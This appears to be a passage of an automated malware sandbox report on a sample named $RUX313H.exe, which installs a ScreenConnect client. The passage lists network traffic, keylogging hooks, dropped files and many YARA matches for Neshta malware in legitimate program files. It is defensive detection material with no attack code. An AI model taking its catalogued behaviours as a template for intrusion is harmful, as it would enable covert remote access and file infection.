                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
                          Source: $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmp, ScreenConnect.ClientService.exeString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                          Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmpString found in binary or memory: https://www.globalsign.com/repository/03
                          Source: unknownDNS traffic detected: queries for: instance-qchhoo-relay.screenconnect.com
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Contains functionality to log keystrokes (.Net Source)Show sources
                          Source: ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                          Source: $RUX313H.exe, 00000000.00000002.1193734228.000000000062A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                          Source: $RUX313H.exe, 00000000.00000003.902550640.0000000002190000.00000004.00000001.sdmpBinary or memory string: _WinAPI_RegisterRawInputDevices.au3
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_3_022C8D160_3_022C8D16
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1AD71_2_00DF1AD7
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF63A51_2_00DF63A5
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_0342E0181_2_0342E018
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_034288301_2_03428830
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_0342E9A31_2_0342E9A3
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F239D9_2_003F239D
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F90329_2_003F9032
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003FA8119_2_003FA811
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003FB07C9_2_003FB07C
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F78B49_2_003F78B4
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F95A49_2_003F95A4
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F8AC09_2_003F8AC0
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_005E47419_2_005E4741
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_038063269_2_03806326
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFA363241AB11_2_00007FFA363241AB
                          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                          Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
                          Source: Joe Sandbox ViewDropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                          Source: $RUX313H.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                          Source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
